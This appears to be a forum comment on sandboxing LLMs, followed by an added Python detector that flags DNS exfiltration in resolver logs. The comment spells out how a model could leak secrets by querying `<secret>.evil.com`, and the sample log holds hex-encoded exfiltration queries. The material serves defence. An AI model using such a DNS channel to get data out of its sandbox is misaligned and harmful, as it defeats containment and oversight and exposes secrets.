srcreigh 6 hours ago
Not just the LLM, but any code that the LLM outputs also has to be firewalled. Sandboxing your LLM but then executing whatever it wants in your web browser defeats the point. CORS does not help. Also, the firewall has to block most DNS traffic, otherwise the model could query `A <secret>.evil.com` and Google/Cloudflare servers (along with everybody else) will forward the query to evil.com. Secure DNS, therefore, also can't be allowed. katakate[1] is still incomplete, but something like it is the solution here. Run the LLM and its code in firewalled VMs.
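The DNS channel the comment describes (a secret encoded into the leftmost label of a query that the resolver chain forwards to the attacker's authoritative server) leaves a recognisable trace in the resolver's query log: many unique, long, high-entropy subdomains under one base domain from a single client. The following is an added example, not code from the comment or from katakate, showing how a sandbox operator could scan those logs for that pattern. The log line format (`<timestamp> <client> <qtype> <qname>`), the sample records, the thresholds, and the "base domain = last two labels" heuristic are all assumptions; a production version would use the public suffix list to find the registrable domain.

```python
import math
import re
from collections import defaultdict

# Constructed sample of resolver query logs from inside a sandbox network.
# Format is assumed: "<unix_ts> <client_ip> <qtype> <qname>".
# The 10.0.0.7 client issues hex-encoded labels under one base domain.
SAMPLE_LOG = """\
1700000000 10.0.0.5 A api.example.com
1700000001 10.0.0.5 AAAA api.example.com
1700000002 10.0.0.5 A cdn.example.com
1700000003 10.0.0.7 A 4a6f686e446f652d73656372.evil.example
1700000004 10.0.0.7 A 65742d746f6b656e2d313233.evil.example
1700000005 10.0.0.7 A 343536373839616263646566.evil.example
1700000006 10.0.0.7 A 6768696a6b6c6d6e6f707172.evil.example
1700000007 10.0.0.5 A mail.example.com
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(label: str) -> float:
    """Bits of entropy per character of a DNS label (0.0 for an empty label)."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def parse_log(text: str):
    """Yield (ts, client, qtype, qname) tuples, skipping malformed lines."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, client, qtype, qname = m.groups()
            yield int(ts), client, qtype.upper(), qname.rstrip(".").lower()


def split_qname(qname: str):
    """Return (leftmost_label, base_domain) using the assumed last-two-labels rule."""
    labels = qname.split(".")
    if len(labels) < 3:
        return "", qname  # bare base domain, no subdomain to encode data in
    return labels[0], ".".join(labels[-2:])


def flag_exfil_candidates(text: str, min_unique: int = 3,
                          max_label_len: int = 20, min_entropy: float = 3.0) -> dict:
    """
    Return {base_domain: reason} for base domains whose subdomain usage looks like
    an encoding channel: at least `min_unique` distinct leftmost labels from one
    client, and labels that are either long or high-entropy.
    """
    # (client, base) -> set of leftmost labels seen
    seen = defaultdict(set)
    for _ts, client, _qtype, qname in parse_log(text):
        label, base = split_qname(qname)
        if label:
            seen[(client, base)].add(label)

    flagged = {}
    for (client, base), labels in seen.items():
        if len(labels) < min_unique:
            continue
        longest = max(len(l) for l in labels)
        mean_entropy = sum(shannon_entropy(l) for l in labels) / len(labels)
        if longest >= max_label_len or mean_entropy >= min_entropy:
            flagged[base] = (f"client {client}: {len(labels)} unique labels, "
                             f"longest {longest} chars, mean entropy {mean_entropy:.2f} bits/char")
    return flagged


if __name__ == "__main__":
    for base, reason in flag_exfil_candidates(SAMPLE_LOG).items():
        print(f"SUSPECT {base}: {reason}")
```

Against the constructed sample this flags only `evil.example`; the ordinary `api`/`cdn`/`mail` labels under `example.com` stay below both the uniqueness and the length/entropy thresholds. The detector is a complement to, not a substitute for, the egress policy the comment argues for: it only sees queries that reach the operator's resolver, so encrypted DNS (DoH/DoT) to third parties still has to be blocked at the firewall for the log to be authoritative.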